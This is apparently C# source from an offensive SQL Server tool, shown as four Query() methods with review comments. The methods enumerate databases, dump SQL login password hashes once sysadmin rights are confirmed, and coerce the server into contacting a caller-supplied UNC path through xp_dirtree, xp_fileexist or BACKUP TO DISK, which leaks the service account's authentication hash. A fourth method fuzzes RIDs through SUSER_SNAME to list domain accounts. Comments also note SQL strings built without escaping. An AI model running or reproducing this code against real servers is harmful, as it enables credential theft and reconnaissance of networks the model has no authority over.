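        /// <summary>
        /// Enumerates the databases on <c>instance</c> and stores the rows in <c>databases</c>.
        /// The statement is assembled from the <c>query1_*</c> fragments; <c>query1_3</c> is only
        /// included for SQL Server major versions above 10, and each non-empty <c>*Filter</c>
        /// string is appended verbatim.
        /// </summary>
        /// <returns>
        /// <c>true</c> when the query ran; <c>false</c> when the connection, the server-info
        /// lookup, or the version parse fails.
        /// </returns>
        internal override bool Query()
        {
            string query1_1 = string.Format(
                "SELECT  \'{0}\' as [ComputerName],\n" +
                "\'{1}\' as [Instance],",
                computerName, instance);

            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                SQLServerInfo serverInfo = new SQLServerInfo(credentials);
                serverInfo.SetInstance(instance);
                if (!serverInfo.Query())
                {
                    return(false);
                }
                SQLServerInfo.Details details = serverInfo.GetResults();

                // The other Query() implementations treat an unparseable version as a failure;
                // silently falling back to 0 here dropped query1_3 without any notice.
                int versionShort;
                if (!int.TryParse(details.SQLServerMajorVersion.Split('.').First(), out versionShort))
                {
                    Console.WriteLine("[-] Unable to ascertain SQL Version");
                    Console.WriteLine("[*] It is possible to override this with the --version flag");
                    return(false);
                }

                StringBuilder sb = new StringBuilder();
                sb.Append(query1_1);
                sb.Append(query1_2);
                if (versionShort > 10)
                {
                    sb.Append(query1_3);
                }
                sb.Append(query1_4);

                // The filters are raw SQL fragments concatenated into the statement unescaped;
                // they are expected to be derived from the caller's own options, not server data.
                foreach (string filter in new[] { databaseFilter, noDefaultsFilter, hasAccessFilter, sysAdminFilter })
                {
                    if (!string.IsNullOrEmpty(filter))
                    {
                        sb.Append(filter);
                    }
                }
#if DEBUG
                Console.WriteLine(sb.ToString());
#endif
                databases = sql.Query <Database>(sb.ToString(), new Database());
            }
            return(true);
        }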
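        /// <summary>
        /// Retrieves login hash rows from <c>instance</c> into <c>hashes</c>. Requires sysadmin
        /// membership; the statement used depends on the server's major version
        /// (<c>QUERY1_1</c> above 8, <c>QUERY2_1</c> otherwise).
        /// </summary>
        /// <returns>
        /// <c>true</c> when the query ran; <c>false</c> on connection failure, a failed
        /// server-info lookup, missing sysadmin rights, or an unparseable server version.
        /// </returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                if (!SQLSysadminCheck.Query(instance, computerName, credentials))
                {
                    Console.WriteLine("[-] User is not Sysadmin");
                    return(false);
                }

                SQLServerInfo i = new SQLServerInfo(credentials);
                i.SetInstance(instance);
                // The result was previously ignored; report a failed lookup as a failure, as the
                // database-enumeration Query() does.
                if (!i.Query())
                {
                    return(false);
                }
                SQLServerInfo.Details d = i.GetResults();

                int versionShort;
                if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
                {
                    Console.WriteLine("[-] Unable to ascertain SQL Version");
                    Console.WriteLine("[*] It is possible to override this with the --version flag");
                    return(false);
                }

                string query = versionShort > 8 ? QUERY1_1 : QUERY2_1;
                hashes = sql.Query <Hash>(query, new Hash());
            }
            // Previously returned false even after a successful query, unlike the sibling
            // Query() implementations, so callers could not distinguish success from failure.
            return(true);
        }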
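        /// <summary>
        /// Issues two version-dependent statements against <c>instance</c> that reference
        /// <c>uncpath</c>: BACKUP LOG / BACKUP DATABASE on major versions below 11,
        /// xp_dirtree / xp_fileexist otherwise. The results of <c>_Query</c> are not inspected.
        /// </summary>
        /// <returns>
        /// <c>true</c> when both statements were issued; <c>false</c> when the connection, the
        /// server-info lookup, or the version parse fails.
        /// </returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                // A failed connection previously fell through to "return true", so callers
                // could not tell that nothing was issued.
                if (!sql.Connect())
                {
                    return(false);
                }

                SQLServerInfo i = new SQLServerInfo(credentials);
                i.SetInstance(instance);
                if (!i.Query())
                {
                    return(false);
                }
                SQLServerInfo.Details d = i.GetResults();

                int versionShort;
                if (!int.TryParse(d.SQLServerMajorVersion.Split('.').First(), out versionShort))
                {
                    Console.WriteLine("[-] Unable to ascertain SQL Version");
                    Console.WriteLine("[*] It is possible to override this with the --version flag");
                    return(false);
                }

                string query1;
                string query2;
                if (versionShort < 11)
                {
                    // NOTE(review): the database name [TESTING] is hard-coded, so this branch can
                    // only succeed where such a database exists — confirm whether it should be
                    // a parameter.
                    query1 = string.Format("BACKUP LOG [TESTING] TO DISK = \'{0}\'", uncpath);
                    query2 = string.Format("BACKUP DATABASE [TESTING] TO DISK = \'{0}\'", uncpath);
                }
                else
                {
                    query1 = string.Format("xp_dirtree \'{0}\'", uncpath);
                    query2 = string.Format("xp_fileexist \'{0}\'", uncpath);
                }

                _Query(sql, query1);
                _Query(sql, query2);
            }
            return(true);
        }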
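        /// <summary>
        /// Resolves the SID of <c>domainGroup</c> through SUSER_SID, then queries SUSER_SNAME for
        /// every RID in <c>[start, end]</c> and records each resolved name in <c>fuzzed</c>.
        /// </summary>
        /// <returns>
        /// <c>true</c> when the whole range was processed; <c>false</c> when the connection or
        /// server-info lookup fails, the group SID cannot be resolved, or a result row cannot
        /// be read.
        /// </returns>
        internal override bool Query()
        {
            using (SQLConnection sql = new SQLConnection(instance))
            {
                sql.BuildConnectionString(credentials);
                if (!sql.Connect())
                {
                    return(false);
                }

                SQLServerInfo info = new SQLServerInfo(credentials);
                info.SetInstance(instance);
                // The result was previously ignored; treat a failed lookup as a failure like
                // the other Query() implementations do.
                if (!info.Query())
                {
                    return(false);
                }
                SQLServerInfo.Details d = info.GetResults();

                domainName = d.DomainName;

                // domainName comes from the server's own response and domainGroup from the
                // caller; both are placed inside a quoted literal without escaping.
                string query1_1 = string.Format("SELECT SUSER_SID(\'{0}\\{1}\') as DomainGroupSid", domainName, domainGroup);
#if DEBUG
                Console.WriteLine(query1_1);
#endif
                DataTable table  = sql.Query(query1_1);
                DataRow   sidRow = table.AsEnumerable().FirstOrDefault();
                // SUSER_SID returns NULL (DBNull) for an unknown principal; the former unchecked
                // byte[] cast threw outside any handler. Substring(0, 48) below also needs at
                // least 24 bytes.
                byte[] sidBytes = sidRow == null ? null : sidRow["DomainGroupSid"] as byte[];
                if (sidBytes == null || sidBytes.Length < 24)
                {
                    Console.WriteLine("[-] Unable to resolve SID for {0}\\{1}", domainName, domainGroup);
                    return(false);
                }
                // Keep the first 24 bytes (48 hex digits): the domain portion without the group's RID.
                string strSid = BitConverter.ToString(sidBytes).Replace("-", "").Substring(0, 48);

                Console.WriteLine("Base SID: {0}", strSid);

                for (int i = start; i <= end; i++)
                {
                    string rid = "0x" + strSid + RidToLittleEndianHex(i);

                    string query2_1 = string.Format("SELECT SUSER_SNAME({0}) as [DomainAccount]", rid);
#if DEBUG
                    Console.WriteLine(query2_1);
#endif
                    table = sql.Query(query2_1);

                    foreach (DataRow row in table.AsEnumerable())
                    {
                        try
                        {
                            if (row["DomainAccount"] is DBNull)
                            {
                                continue;
                            }

                            Fuzz f = new Fuzz
                            {
                                ComputerName  = computerName,
                                Instance      = instance,
                                SID           = rid,
                                RID           = i,
                                DomainAccount = (string)row["DomainAccount"],
                            };
                            fuzzed.Add(f);
                        }
                        catch (ArgumentNullException)
                        {
                            // Same outcome as the former type test inside a generic catch: skip the row.
                            continue;
                        }
                        catch (Exception ex)
                        {
                            Console.WriteLine(ex.Message);
                            return(false);
                        }
                    }
                }
            }
            return(true);
        }

        /// <summary>
        /// Formats a RID as the 8 lowercase hex digits of its 4-byte little-endian encoding, the
        /// form appended to the hex SID literal above (e.g. 500 -> "f4010000").
        /// </summary>
        /// <param name="rid">The relative identifier to encode.</param>
        /// <returns>Exactly eight lowercase hex characters.</returns>
        private static string RidToLittleEndianHex(int rid)
        {
            // Replaces the former hex-string / pair-split / reverse / PadRight sequence with a
            // direct byte-wise encoding; produces the same text for every 32-bit value and
            // drops the dependency on the Split helper.
            return string.Format("{0:x2}{1:x2}{2:x2}{3:x2}",
                rid & 0xff, (rid >> 8) & 0xff, (rid >> 16) & 0xff, (rid >> 24) & 0xff);
        }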